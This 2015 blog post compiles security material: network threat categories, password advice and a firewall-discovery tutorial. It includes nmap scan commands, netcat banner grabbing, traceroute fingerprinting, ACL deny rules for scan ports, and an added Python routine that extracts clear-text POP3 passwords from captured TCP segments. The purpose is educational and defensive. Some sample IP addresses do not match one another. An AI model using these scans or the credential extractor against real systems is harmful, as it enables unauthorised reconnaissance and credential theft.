Security vulnerabilities and attack methods

Posted on 09-Sep-2015

Description: the main security vulnerabilities and the forms of attack used against the Windows operating system.

Part I: Security weaknesses and forms of network attack

I. Threats to security: there are basically four kinds of threat to network security:

1) Unstructured threats: these come from unskilled hackers with little real experience. They are curious, want to download tools from the Internet and try them out, and are genuinely excited when they see what they can do.

2) Structured threats: the hackers behind these are far more sophisticated than the unstructured kind. They have technical skill and understand how the network is built, they know how to exploit its weaknesses, and they work in an organised way with methods for penetrating deep into the network. Both structured and unstructured threats carry out their attacks over the Internet.

3) External threats: these originate on the Internet; the attackers find holes in the network from the outside. As soon as a company starts advertising its presence on the Internet, hackers begin scanning it for weaknesses, stealing data and damaging the network.

4) Internal threats: these are especially dangerous because they come from inside the organisation, typically from employees or from the administrators themselves. Such people can attack quickly, cleanly and easily because they know the structure of the network and where its weak points are.

II. Security weaknesses: understanding where security is weak is essential to putting an effective security policy in place, and it lets you secure the network before a hacker attacks it. Cisco groups security weaknesses into three classes: technology weaknesses, configuration weaknesses and policy weaknesses.

1) Technology weaknesses: weaknesses in protocols, operating systems and hardware.

a) TCP/IP weaknesses: TCP/IP is a security weakness because it was designed as an open standard to make exchanging information easy. That is what made it so widely used, but it also makes it easy to attack, because almost everyone is familiar with how TCP/IP works. Two protocols in the TCP/IP suite that Cisco singles out as inherently insecure are SMTP (TCP) and SNMP (UDP). Typical attacks against them are IP spoofing, man-in-the-middle and session replay.

b) Operating system weaknesses: every operating system has weaknesses, but Linux and Unix are considered to have fewer than Windows. In practice, most people run some version of Windows.

c) Network equipment weaknesses: almost all network equipment (servers, switches, routers) has security weaknesses, but a good policy for configuring and installing network devices greatly reduces their impact.

2) Configuration weaknesses: these are mistakes made by the administrator. They come from oversights in configuration such as unsecured user accounts, system accounts with easily guessed passwords, leaving the default settings of a device unsecured, or simply misconfiguring the device.

a) Unsecured user accounts: every user account needs a username and password for security. These usernames and passwords are often sent across the network in clear text, so user accounts need a protection policy covering encryption and authentication.

b) System accounts with easily guessed passwords: another configuration weakness is protecting an account with a password that is easy to steal. To prevent this, the administrator needs a policy that does not allow a password to remain valid forever: every password must have an expiry date.

c) Misconfigured Internet services: some companies use real (publicly routable) Internet addresses for their hosts and servers. This creates a weakness that hackers can easily exploit to gather information. Using NAT or PAT solves the problem: private addresses let you address hosts and servers without using real Internet addresses, while the real address is routed out to the Internet by the border router. Even so, that is not the whole answer. The port on the Internet-facing interface must be open so that users can reach the Internet and vice versa, and that is a hole in the firewall a hacker can attack through. You can secure the network by using conduits, which are basic secured connections. The Cisco Secure Private Internet Exchange (PIX) firewall is the preferred way to provide good security for the network.

d) Unsecured default settings in products: many hardware products ship with no password, or with a preset password, so that the administrator can configure the device easily. That makes the job easier, since some devices just need to be plugged in and they work, but it also makes attacking the network easy. So a secure configuration policy must be applied to every device before it is installed on the network.

e) Misconfigured network equipment: device misconfiguration is a hole that can be exploited to attack the network. Weak passwords, no security policy and unsecured user accounts are all device configuration errors. The hardware and the protocols running on the device also create holes; if you have no security policy for that hardware and those protocols, hackers will take advantage of them. If you run SNMP with its default settings, information can be stolen quickly and easily, so make sure you disable SNMP or change its default settings (in particular the default community strings).

3) Policy weaknesses: a security policy describes how and where security is to be implemented; it is the essential condition for security to be effective. Policy weaknesses include: absence of a written security policy, organisational politics, lack of business continuity, lax security administration, installations and changes that do not follow the stated policy, and no disaster recovery plan.

III. Types of network attacks: network attacks can be divided into four kinds:

1) Reconnaissance attacks: the hacker first pings the target to find live IP addresses, then determines which ports and services are alive on those addresses. From this information the hacker works out the type and version of the operating system, and then proceeds to steal data or damage the operating system. Attacks of this kind include packet sniffers, port scans, ping sweeps and Internet information queries.

a) Packet sniffers: a packet sniffer is an application that uses a network adapter in promiscuous mode to capture every packet sent across a LAN. It only works within a single collision domain. Sniffers harvest information that is transmitted in clear text; protocols that transmit in clear text include Telnet, FTP, SNMP, POP and HTTP. An example:

Code: TCP - Transmission Control Protocol
Source Port: 3207
Destination Port: 110 pop3
Sequence Number: 1904801188
Ack Number: 1883396256
Offset: 5 (20 bytes)
Reserved: %000000
Flags: %011000
0. .... (No Urgent pointer)
.1 .... Ack
.. 1... Push
.. .0.. (No Reset)
.. ..0. (No SYN)
.. ...0 (No FIN)
Window: 64161
Checksum: 0x078F
Urgent Pointer: 0
No TCP Options

POP - Post Office Protocol
Line 1: PASS secretpass

We can see the password, secretpass, being sent in clear text. Because the packet is transmitted unencrypted, it can be read by anyone running a packet sniffer. The following tools are used to counter packet sniffers: authentication, a switched infrastructure, antisniffer tools and cryptography.
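As an added example, not part of the original page, here is a small Python decoder that parses a raw TCP segment like the one shown above and pulls the POP3 credential out of its payload. The segment bytes are constructed in the block to match the fields of the capture (they are not a real capture); the port-to-protocol table and the USER/PASS pattern are my assumptions about what a sniffer keys on.

```python
"""Parse a raw TCP segment and pull a clear-text POP3 credential out of it."""
import re
import struct

# Ports of the clear-text protocols the page lists (assumed mapping for this example).
CLEAR_TEXT_PORTS = {21: "FTP", 23: "Telnet", 80: "HTTP", 110: "POP3", 143: "IMAP", 161: "SNMP"}
# TCP flag bits in the order they appear in the 6-bit flags field, low bit first.
FLAG_BITS = [("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04), ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20)]
# POP3/FTP style credential lines as they appear on the wire.
CRED_RE = re.compile(rb"^(USER|PASS)\s+(\S+)", re.IGNORECASE | re.MULTILINE)


def parse_tcp_segment(segment: bytes) -> dict:
    """Decode the fixed 20-byte TCP header and return its fields plus the payload."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    src, dst, seq, ack, off_res, flags, win, csum, urg = struct.unpack("!HHIIBBHHH", segment[:20])
    header_len = (off_res >> 4) * 4          # data offset is the high nibble, in 32-bit words
    if header_len < 20 or header_len > len(segment):
        raise ValueError("bad data offset")
    return {
        "src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
        "header_len": header_len,
        "flags": [name for name, bit in FLAG_BITS if flags & bit],
        "window": win, "checksum": csum, "urgent": urg,
        "payload": segment[header_len:],
    }


def extract_clear_text_credentials(segment: bytes) -> dict:
    """Return any USER/PASS tokens seen on a port that carries a clear-text protocol."""
    seg = parse_tcp_segment(segment)
    proto = CLEAR_TEXT_PORTS.get(seg["dst_port"]) or CLEAR_TEXT_PORTS.get(seg["src_port"])
    creds = {}
    if proto:
        for key, val in CRED_RE.findall(seg["payload"]):
            creds[key.decode().upper()] = val.decode(errors="replace")
    return {"protocol": proto, "flags": seg["flags"], "credentials": creds}


def build_sample_segment() -> bytes:
    """Constructed sample matching the fields in the capture on the page (not real traffic)."""
    header = struct.pack("!HHIIBBHHH", 3207, 110, 1904801188, 1883396256,
                         5 << 4, 0x18, 64161, 0x078F, 0)   # 0x18 = PSH + ACK, i.e. %011000
    return header + b"PASS secretpass\r\n"


if __name__ == "__main__":
    print(extract_clear_text_credentials(build_sample_segment()))
```

The checksum is carried through but not verified, because a sniffer reads whatever passes; a defensive tool would validate it before trusting the payload.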

Authentication: the common form of this is one-time passwords (OTPs). The technique combines two factors: a personal identification number (PIN) and a token card, which authenticates a device or an application. The token card is a hardware or software device that generates an apparently random value (a password) for a fixed interval, typically 60 seconds. The user combines that value with their PIN to form a unique password. If a hacker captures the password with a packet sniffer, the information is worthless because it has already expired.
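The page describes the token-card scheme only in words. The following added example, which is not from the page or from Cisco, implements the same idea with the standard TOTP construction of RFC 6238: an HMAC over a 60-second time counter stands in for the token card, the user prepends the PIN, and the server checks with a small clock-skew allowance, so a sniffed value stops working once its window has passed. The secret, PIN and timestamps are made up for the demonstration.

```python
"""Time-based one-time passwords: a sniffed code is useless once its window passes."""
import hashlib
import hmac
import struct

STEP_SECONDS = 60  # the page says token cards typically rotate every 60 seconds


def totp_code(secret: bytes, now: int, step: int = STEP_SECONDS, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time counter, then dynamic truncation."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def combined_password(pin: str, secret: bytes, now: int) -> str:
    """What the user actually types: the PIN followed by the token-card code."""
    return pin + totp_code(secret, now)


def verify(pin: str, secret: bytes, submitted: str, now: int, skew_steps: int = 1) -> bool:
    """Server side: accept the current window and +-skew_steps neighbours, constant-time compare."""
    for k in range(-skew_steps, skew_steps + 1):
        expected = pin + totp_code(secret, now + k * STEP_SECONDS)
        if hmac.compare_digest(expected, submitted):
            return True
    return False


if __name__ == "__main__":
    secret, pin, t = b"12345678901234567890", "1234", 1_000_000   # constructed values
    pw = combined_password(pin, secret, t)
    print(pw, verify(pin, secret, pw, t), verify(pin, secret, pw, t + 600))
```

The skew allowance is the usual trade-off: one step either side covers clock drift, but every extra step widens the window in which a captured code can be replayed, so a real server should also record used codes within the window.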

Switched infrastructure: this can be used to limit packet sniffing on the network. For example, if the whole network runs on Ethernet switches, a hacker can only see the traffic flowing to the one host they are attached to. It does not stop packet sniffing entirely (a switch can still be tricked into forwarding other hosts' traffic, for example by ARP spoofing or MAC flooding), but it reduces its reach.

Antisniffer tools: software and hardware designed to detect sniffers. They cannot eliminate the risk of sniffing entirely, but like the other tools they are one part of the overall system.

Cryptography: encryption lets data cross the network without being in clear text. Even if a hacker captures the data, it cannot be decoded. This method is more effective than detecting and blocking sniffers: if the channel is encrypted, whatever a packet sniffer captures is worthless because it is not the original information. Cisco's encryption is based on IPSec, a tunnelling protocol that encrypts at the IP layer. Other such protocols are Secure Shell (SSH) and Secure Sockets Layer (SSL).

b) Port scans and ping sweeps: these are carried out to identify the services on the network, identify the hosts and devices that are running, identify the operating systems in use, and identify all the weak points of the network so that further goals can be pursued. With a ping sweep the hacker obtains a list of the live hosts in an environment. Then the hacker uses a port scanner to cycle through all the ports and produce a complete list of the services running on each host found by the ping sweep. Next, the hacker picks out the services with weaknesses and attacks them. An IDS is used to warn the administrator when reconnaissance such as port scans and ping sweeps takes place, giving the administrator time to prepare and block the hacker.

c) Internet information queries: DNS queries can reveal a lot, such as who owns a domain and which address range is assigned to it. Hackers use this as reconnaissance to discover information about the network. Together with port scans and ping sweeps, once they have complete information about the active ports and the protocols running on them, hackers examine the characteristics of those applications to find weaknesses and begin the attack.

2) Access attacks: here the intruder attacks the network to steal data, gain access, and gain privileged access for later. Access attacks include password attacks, trust exploitation, port redirection and man-in-the-middle attacks.

a) Password attacks: hackers can break into systems with brute-force attacks, trojan horses, IP spoofing and packet sniffers. A brute-force attack is usually run as a program that works through the network trying to gain access to shares. Once the hacker gains access to a resource, they have the same rights as the user who shares it; if that resource is privileged, the hacker sets up a back door for later access. The hacker can change routing tables so that all packets are sent to the hacker before reaching their final destination, and in some cases can monitor all traffic, truly becoming a man in the middle. Password attacks can be limited by: not allowing users to use the same password on several systems; disabling an account after a number of failed logins, which stops repeated password guessing; not using clear-text passwords (use OTPs or encrypted passwords as described above); and using strong passwords of at least 8 characters containing uppercase letters, lowercase letters, digits and special characters.

b) Trust exploitation: this attacks the trust relationships inside a network. Normally, if two domains trust each other, devices in one domain are allowed to access the other. A hacker exploits flaws in that trust relationship to compromise, that is take control of, systems. Systems outside the firewall should have no trust relationship at all with systems inside it.

c) Port redirection: a variant of trust exploitation that uses a compromised host to get traffic through the firewall. Picture a firewall with three interfaces, each connected to one host. The outside host can reach the public services host (usually placed in a demilitarised zone, DMZ), and the public services host can reach both the inside and the outside host. The hacker compromises the public services host and installs software on it that relays traffic directly from the outside host to the inside host. The firewall allows that connection, because as far as it can see the traffic comes from the trusted public services host, so the outside host gets a connection to the inside host through port redirection on the intermediate (public services) host.

d) Man-in-the-middle attacks: these are carried out with network packet sniffers and the routing and transport protocols. Their aims are stealing data, hijacking a session, analysing network traffic, denial of service and corrupting the data in transit. An example is someone working at an ISP who tries to access every packet passing between the ISP and any other network. This attack can be prevented with encryption: if the traffic is encrypted in an IPSec tunnel, the hacker sees only worthless data. (vnpro.org)

Protecting personal information with strong passwords

Passwords are the keys you use to access the personal information stored on your computer and in your online accounts.

If thieves or other malicious users steal this information, they can use your name to open credit card accounts, and in many cases you will not notice the attack until it is too late. Fortunately, creating good passwords and keeping them safe is not hard.

What makes a strong password

To an attacker, a strong password should look like a random string of characters. The following criteria help your password achieve that:

Make it long. Every character you add increases the protection; a password should be more than 8 characters long, and 14 characters or more is ideal.

Many systems also allow the space bar in passwords, so you can build a phrase from several words (a passphrase). A passphrase is often easier to remember than a simple password, while being longer and harder to guess.

Combine letters, numbers and symbols. The greater the variety of characters in your password, the harder it is to guess. Important points:

- The fewer kinds of character in the password, the longer it must be. A 15-character string of random letters and digits is about 33,000 times stronger than an 8-character password built from the whole keyboard, according to the figure the original article gives (comparing the raw keyspaces, 36^15 against 95^8, gives a ratio closer to 33 million, so the conclusion only gets stronger). If you cannot use symbols, the password must be considerably longer to get the same protection. An ideal password combines length with a variety of character types.

- Use the whole keyboard, not just the common characters. Symbols produced by holding Shift and pressing a number key are very common in passwords; a password is much stronger if you also choose from the rest of the keyboard.

Use words and phrases that are easy for you to remember but hard for others to guess. The easiest way to remember your passwords and passphrases is to write them down. There is nothing wrong with writing passwords down, but the written copy needs to be protected to stay secure and effective.

Create a secure, memorable password in 6 steps:

1. Think of a sentence you can remember. Example: My son Aiden is three years old

2. Check whether the computer or online system supports spaces in passwords.

3. If it does not, convert the sentence into a password by taking the first letter of each word. From the example above you get msaityo.

4. Add complexity by mixing uppercase, lowercase and numbers.

5. Finally, substitute some special characters. You can use symbols that look like letters, run words together (replacing the spaces) and other tricks to make the password more complex.

6. Test the password with Password Checker, a web site that does not record what you type and simply helps you judge how secure your password is.

Things a password must avoid

Some methods of constructing passwords produce ones that criminals guess easily. To avoid this weakness, steer clear of the following:

* Sequences or repeated characters, e.g. 123456, 2222
* The usual letter-for-number substitutions, e.g. i -> 1 or a -> @
* Your login name
* Dictionary words, in any language
* Using the same password in more than one place
* Storing passwords online
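As an added example that is not part of the Microsoft article, the following Python carries the six-step procedure and the avoid list through in code: it derives a password from the sample sentence, scores length and character variety as a keyspace, and flags sequences, repeats, the login name and dictionary words, including words hidden behind the look-alike substitutions the page warns about. The number-word mapping, the trailing symbol, the look-alike table and the tiny word list are my own choices; the word list is a constructed stand-in for a real dictionary.

```python
"""Passphrase-derived passwords and the checks behind the page's 'things to avoid' list."""
import math
import re

NUMBER_WORDS = {"one": "1", "two": "2", "three": "3", "four": "4", "five": "5",
                "six": "6", "seven": "7", "eight": "8", "nine": "9"}
# Look-alike substitutions guessers try first; the page names i->1 and a->@ (table assumed).
LOOKALIKES = {"1": "i", "!": "i", "@": "a", "3": "e", "0": "o", "$": "s", "5": "s"}
# Constructed stand-in for a real wordlist.
DICTIONARY = {"password", "welcome", "secret", "letmein", "dragon", "monkey", "aiden"}


def passphrase_to_password(sentence: str, supports_spaces: bool) -> str:
    """Steps 2-5: keep the sentence where spaces are allowed; otherwise take the initial of
    each word (keeping its case), turn number words into digits and append a symbol.
    'My son Aiden is three years old' -> 'MsAi3yo!'"""
    if supports_spaces:
        return sentence
    pieces = [NUMBER_WORDS.get(word.lower(), word[0]) for word in sentence.split()]
    return "".join(pieces) + "!"


def keyspace_bits(password: str) -> float:
    """Rough strength as log2(charset ** length), charset sized by the classes actually used."""
    size = 0
    if re.search(r"[a-z]", password):
        size += 26
    if re.search(r"[A-Z]", password):
        size += 26
    if re.search(r"[0-9]", password):
        size += 10
    if re.search(r"[^A-Za-z0-9]", password):
        size += 33  # printable ASCII punctuation plus space
    return len(password) * math.log2(size) if size else 0.0


def _has_run(text: str, length: int = 4) -> bool:
    """True if `length` consecutive characters step by exactly +1 or -1 (1234, dcba)."""
    for i in range(len(text) - length + 1):
        codes = [ord(c) for c in text[i:i + length]]
        steps = {b - a for a, b in zip(codes, codes[1:])}
        if steps == {1} or steps == {-1}:
            return True
    return False


def password_problems(password: str, username: str = "") -> list:
    """Return the items from the avoid list that the password violates."""
    problems = []
    low = password.lower()
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if re.search(r"(.)\1\1", password):
        problems.append("repeated characters")
    if _has_run(low):
        problems.append("sequential characters")
    if username and username.lower() in low:
        problems.append("contains the login name")
    # Undo the common substitutions so that p@ssw0rd is still caught as 'password'.
    unsubstituted = "".join(LOOKALIKES.get(c, c) for c in low)
    for word in sorted(DICTIONARY):
        if word in low:
            problems.append(f"dictionary word '{word}'")
            break
        if word in unsubstituted:
            problems.append(f"dictionary word '{word}' hidden by look-alike substitution")
            break
    return problems


if __name__ == "__main__":
    pw = passphrase_to_password("My son Aiden is three years old", supports_spaces=False)
    print(pw, round(keyspace_bits(pw), 1), password_problems(pw, username="aiden"))
    print(password_problems("p@ssw0rd"), password_problems("123456"))
```

Note that the keyspace figure is an upper bound: a password derived from a memorable sentence is not uniformly random, which is exactly why the dictionary and substitution checks exist alongside it.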

The blank password option

A blank password (no password at all) on your account is actually safer than a weak password such as 1234. Criminals can easily guess a simple password, but on computers running Windows XP an account with no password cannot be accessed remotely, whether from the local network or from the Internet (this option is not available on Windows 2000, Windows Me and earlier). You can choose a blank password for your computer account if the computer meets these criteria:

* You have only one computer, or you have several but do not need to access information on one from another. * The computer is physically secure (you trust everyone who has physical access to it).

A blank password is not always a good idea. For example, a laptop you carry around cannot be physically secured, so it needs a good password.

How to access and change passwords

Online accounts

Web sites have different rules governing how you access or change your password. Look for a link (such as My account) on the site's home page that leads to the page for managing your password and account.

Computer passwords

Your computer system's help files usually explain how to create, change and access password-protected user accounts. You can also find this information online on the software vendor's pages. For example, if you use Windows XP, the help section shows you how to manage and change passwords.

Keep your passwords secret

Treat your passwords and passphrases with care.

* Do not reveal them to others. Keep your passwords hidden from friends and family members (especially children). Passwords you must share with someone else, such as the password to a bank account you share with your spouse, are the only exception. * Protect any written passwords. Be careful where you hide a password you have written down. * Never send your password by e-mail or in response to an e-mail request. * Change your passwords regularly. * Do not save passwords on a computer you do not control.

What to do if a password is stolen

Make sure you monitor all the information you protect with passwords, such as your monthly financial statements, credit reports and online shopping accounts. Good, memorable passwords help you defend against fraud and identity theft, but they are no guarantee: if someone breaks into a system and steals this information, they have your password. If you see any suspicious activity suggesting someone has accessed your information, report it to the appropriate people as soon as you can. See also the guidance on what to do if you think your identity has been stolen or you may have been defrauded. (From Microsoft)

Firewall - Attack and defense

Ever since Cheswick and Bellovin wrote their book on building firewalls and tracking a wily hacker named Berferd, the idea of putting a web server on the Internet without deploying a firewall has been regarded as suicide. It is equally suicidal to leave firewall duties entirely to the network engineers. They may understand the technical intimacies of a firewall, but they are not in step with the security community and do not study the mindset and techniques of determined hackers. The result is firewalls that can be punched through because of misconfiguration, letting attackers walk into the network and cause disaster.

I. Firewall overview

Two kinds of firewall dominate the market today: application proxies and packet filtering gateways. Application proxies are considered more secure than packet filtering gateways, but their restrictive nature and performance limits tend to confine them to traffic leaving the company rather than traffic arriving at the company's web server. On the other hand, many large organisations have high performance requirements. Many people believe no perfect firewall exists yet, but the future looks promising. Vendors such as Network Associates Inc. (NAI), AXENT, Internet Dynamics and Microsoft are developing technology that provides proxy-style security at packet-filtering performance (a hybrid of the two), though it is not finished. Since the first firewall was installed, firewalls have protected countless networks from prying eyes and vandals, but they are not a cure-all for security. Security holes are found every year in almost every kind of firewall on the market. Worse, most firewalls are misconfigured, unmaintained and unmonitored, leaving the door wide open.

If no mistakes are made, a carefully designed, configured and maintained firewall is almost impossible to penetrate. In practice, most skilled attackers know this and simply go around the firewall by exploiting trust relationships and the weakest points of connection, or avoid it altogether by attacking through a dial-up account.

The bottom line: most attackers put their effort into getting around a strong firewall, and the goal here is to build one. As a firewall administrator, you know how important it is to understand your enemy. Knowing the first steps an attacker takes to bypass firewalls will help you greatly in detecting and responding to an attack. This chapter walks you through the techniques in common use today for discovering and enumerating firewalls, and describes several ways attackers try to bypass them. For each technique we will look at how to detect and prevent the attack.

II. Identifying firewalls

Almost every firewall has a unique electronic "scent". That is, with a simple port scan, firewalking and banner grabbing, attackers can effectively determine the type, version and rules of almost any firewall on the network. Why does this identification matter? Because once they have mapped your firewalls, they can start looking for weaknesses and try to exploit them.

1. Direct scanning: the noisy technique

The easiest way to find firewalls is to scan for their default ports. Some firewalls on the market identify themselves uniquely with a simple port scan; you just need to know what to look for. For example, Check Point's Firewall-1 listens on TCP ports 256, 257 and 258, and Microsoft's Proxy Server usually listens on TCP ports 1080 and 1745. With this knowledge, finding these kinds of firewall is easy with a port scanner such as nmap:

Code: # nmap -n -vv -P0 -p256,1080,1745 192.168.50.1-60.254

The -P0 switch disables the ICMP ping before scanning. This matters because most firewalls do not answer ICMP echo requests. Both timid and bold attackers scan your network widely this way, looking for these firewalls and for any hole in your perimeter. More dangerous attackers will probe your perimeter as quietly as possible. There are many techniques an attacker can use to slip under your radar, including randomising pings, destination ports, destination addresses and source ports; using decoy servers; and running distributed scans from several sources. If you think your intrusion detection system (IDS), such as Internet Security Systems' RealSecure or Abirnet's SessionWall-3, will catch this dangerous attacker, think again. By default most IDSs are configured to catch only the most noisy and obvious port scans. Unless you use a sensitive IDS and tune its detection signatures, most of these attacks go completely unnoticed. You can produce such a randomised scan with the Perl scripts provided on the book's web site, www.osborne.com/hacking.

Countermeasures

You need to block these scans at the border routers or use some kind of intrusion detection tool, free or commercial. Even so, single-port scans are not picked up by default in most IDSs, so you must tune their sensitivity before you can rely on detection.

Detection

To accurately detect port scans that use randomisation and decoy servers, you need to tune each port-scan detection signature. Consult your IDS vendor's documentation for details. To detect the scan above with RealSecure 3.0, you must raise its sensitivity to single-port scans by modifying the port-scan signature parameters. Change the following to make it sensitive to this scan:

1. Select and customise (Customize) the Network Engine Policy.
2. Find "Port Scan" and select Options.
3. Change ports to 5 ports.
4. Change Delta to 60 seconds.

If you run Firewall-1 on UNIX, you can use Lance Spitzner's utility for detecting Firewall-1 port scans, www.enteract.com/~lspitz/intrusion.html. His alert.sh script configures Check Point to detect and monitor port scans and runs a User Defined Alert when one occurs.

Prevention

To stop port scans of the firewall from the Internet, block these ports on the routers in front of the firewalls. If the ISP manages those devices, contact them to do the blocking. If you manage them yourself, the following Cisco ACLs explicitly block the scans shown above:

Code: access-list 101 deny tcp any any eq 256 log ! Block Firewall-1 scans
access-list 101 deny tcp any any eq 257 log ! Block Firewall-1 scans
access-list 101 deny tcp any any eq 258 log ! Block Firewall-1 scans
access-list 101 deny tcp any any eq 1080 log ! Block Socks scans
access-list 101 deny tcp any any eq 1745 log ! Block Winsock scans

Note: if you block the Check Point ports (256-258) at the border routers, you will no longer be able to manage the firewall from the Internet. Also, every router must have a cleanup rule (if it does not deny packets by default), which has the same effect as explicitly denying everything else:

access-list 101 deny ip any any log ! Deny and log any packet that got through our ACLs above

2. Route tracing

A quieter and subtler way to find firewalls on a network is traceroute. You can use UNIX traceroute or NT's tracert.exe to find each hop on the path to the target and draw inferences. Linux traceroute has the -I option, which traces the route with ICMP packets instead of the default UDP packets.

Code: $ traceroute -I www.yourcompany.com
traceroute to www.yourcompany.com (172.17.100.2), 30 hops max, 140 byte packets
1 attack-gw (192.168.50.21) 5.801 ms 5.105 ms 5.445 ms
2 gw1.smallisp.net (192.168.51.1)
3 gw2.smallisp.net (192.168.52.2)
.....
13 hssi.bigisp.net (10.55.201.2)
14 serial1.bigisp.net (10.55.202.1)
15 www.yourcompany.com (172.29.11.2)

There is a good chance the hop just before the target (10.55.202.1) is the firewall, but we cannot be sure yet; we need to dig a little deeper.

The example above works well if the routers between you and the target answer packets whose TTL has expired. But some routers and firewalls are configured not to return ICMP TTL-exceeded messages (for ICMP as well as UDP packets). In that case the inference is less scientific: all you can do is run traceroute, see which hop answers last, and deduce that it is either a firewall or at least the first router on the path that starts blocking tracerouting. In the example below, ICMP is blocked to its destination and there is no response from any router beyond client-gw.smallisp.net (the !X marks an ICMP "communication administratively prohibited" reply):

Code: 1 stoneface (192.168.10.33) 12.640 ms 8.367 ms
2 gw1.localisp.net (172.31.10.1) 214.582 ms 197.992 ms
3 gw2.localisp.net (172.31.10.2) 206.627 ms 38.931 ms
4 dsl.localisp.net (172.31.12.254) 47.167 ms 52.640 ms
........
14 ATM6.LAX2.BIGISP.NET (10.50.2.1) 250.030 ms 391.716 ms
15 ATM7.SDG.BIGISP.NET (10.50.2.5) 234.668 ms 384.525 ms
16 client-gw.smallisp.net (10.50.3.250) 244.065 ms !X * *
17 * * *
18 * * *

Countermeasures

The fix for traceroute information leakage is to stop as many firewalls and routers as possible from responding to TTL-expired packets. This is not always under your control, though, since many of the routers may belong to the ISP.

Detection

To detect standard traceroutes at the border, monitor for UDP and ICMP packets with a TTL of 1. To do this with RealSecure 3.0, make sure the TRACE_ROUTE decode name is checked in the Security Events of the Network Engine Policy.

Prevention

To stop traceroutes at the border, configure the routers not to send TTL EXPIRED messages when they receive a packet with a TTL of 0 or 1. The following ACL works on Cisco routers:

Code: access-list 101 deny icmp any any 11 0 ! ttl-exceeded

Or, ideally, block all unnecessary UDP traffic at the border routers.

3. Banner grabbing

Scanning for firewall ports is useful for locating firewalls, but most firewalls do not listen on well-known default ports the way Check Point and Microsoft do, so their presence has to be inferred. Many popular firewalls announce themselves simply when you talk to them. For example, many proxy firewalls announce that they are a firewall, and some advertise their type and version. When we connect to a suspected firewall with netcat on port 21 (FTP), for instance, we see some interesting information:

Code: C:\TEMP>nc -v -n 192.168.51.129 21
[UNKNOWN] [192.168.51.129] 21 (?) open
220 Secure Gateway FTP server ready.

The banner "Secure Gateway FTP server ready" is a giveaway of an old Eagle Raptor box. Talking to port 23 (telnet) confirms the firewall's name, "Eagle":

Code: C:\TEMP>nc -v -n 192.168.51.129 23
[UNKNOWN] [192.168.51.129] 23 (?) open
Eagle Secure Gateway. Hostname:

And finally, if you are still not convinced the server is a firewall, netcat to port 25 (SMTP) and it will tell you what it is:

Code: C:\TEMP>nc -v -n 192.168.51.129 25
[UNKNOWN] [192.168.51.129] 25 (?) open
421 fw3.acme.com Sorry, the firewall does not provide mail service to you.

As these examples show, banners give attackers valuable information when identifying firewalls. With it, they can go after well-known holes or common misconfigurations.

Countermeasures

To fix this information leak, limit what the banners advertise. A good banner might carry a legal warning and state that all connection attempts are logged. The exact way to change the default banners depends on the particular firewall, so consult the firewall vendor.

Prevention

To stop attackers learning too much about your firewalls from advertised banners, change the banner configuration files. Specific recommendations depend on the firewall vendor. On Eagle Raptor firewalls, you can change the ftp and telnet banners by editing the message-of-the-day files: ftp.motd and telnet.motd.

4. Advanced firewall discovery techniques

If port scanning for firewalls directly, following the route and banner grabbing do not work, attackers move on to the next level of firewall enumeration. Firewalls and their ACL rules can be inferred by probing targets and noting which paths the probes have to take (or not take) to get there.

Simple inference with nmap

Nmap is an excellent tool for discovering firewall information, and we will keep coming back to it. When nmap scans a host it tells you not only which ports are open or closed but also which ports are blocked. The amount of information (or the lack of it) you get from a port scan says a lot about the firewall's configuration. A filtered port in nmap indicates one of three things:

No SYN/ACK packet was received.
No RST/ACK packet was received.
An ICMP type 3 (Destination Unreachable) message with code 13 (Communication Administratively Prohibited, RFC 1812) was received.

Nmap lumps all three conditions together and reports them as a "filtered" port. For example, when scanning www.mycompany.com we receive two ICMP packets telling us the firewall blocks ports 23 and 111 from our system.

Code: # nmap -p20,21,23,53,80,111 -P0 -vv www.mycompany.com
Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Initiating TCP connect() scan against (172.32.12.4)
Adding TCP port 53 (state Open)
Adding TCP port 111 (state Firewalled)
Adding TCP port 80 (state Open)
Adding TCP port 23 (state Firewalled)
Interesting ports on (172.17.12.4):
Port State Protocol Service
23 filtered tcp telnet
53 open tcp domain
80 open tcp http
111 filtered tcp sunrpc

The "Firewalled" state in the output above results from receiving an ICMP type 3, code 13 (Admin Prohibited Filter), as seen in the tcpdump output:

Code: 23:14:01.229743 10.55.2.1 > 172.29.11.207: icmp: host 172.32.12.4 unreachable - admin prohibited filter
23:14:01.979743 10.55.2.1 > 172.29.11.207: icmp: host 172.32.12.4 unreachable - admin prohibited filter

How does nmap match these packets to the probes it sent, given that they are just a few among the sea of packets flowing across the network? The ICMP error returned to the scanner carries everything needed to work out what happened: an ICMP destination-unreachable message quotes the IP header and the first eight bytes of the packet that triggered it, so the original destination port can be read back out of the quoted TCP header, and the source address of the outer IP header identifies the firewall that filtered the packet. Finally, an unfiltered port appears in nmap only when you scan a number of ports and get a RST/ACK back. In the "unfiltered" state, either our scan is passing through the firewall and the target host is telling us it does not listen on that port, or the firewall is answering on the target's behalf, spoofing its IP address with the RST/ACK flags set. For example, scanning a local system gives two unfiltered ports when it receives two RST/ACK packets from the target. The same can happen with some firewalls, such as Check Point (with a REJECT rule), when it answers for the target by sending a RST/ACK and spoofing the target's source IP address.

Code: # nmap -sS -p1-300 172.18.20.55
Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (172.18.20.55):
(Not showing ports in state: filtered)
Port State Protocol Service
7 unfiltered tcp echo
53 unfiltered tcp domain
256 open tcp rap
257 open tcp set
258 open tcp yak-chat
Nmap run completed - 1 IP address (1 host up) scanned in 15 seconds

The matching tcpdump trace shows the RST/ACK packets received:

Code: 21:26:22.742482 172.18.20.55.258 > 172.29.11.207.39667: S 1415920470:1415920470(0) ack 3963453111 win 9112 (DF) (ttl 254, id 50438)
21:26:23.282482 172.18.20.55.53 > 172.29.11.207.39667: R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50439)
21:26:24.362482 172.18.20.55.257 > 172.29.11.207.39667: S 1416174328:1416174328(0) ack 3963453111 win 9112 (DF) (ttl 254, id 50440)
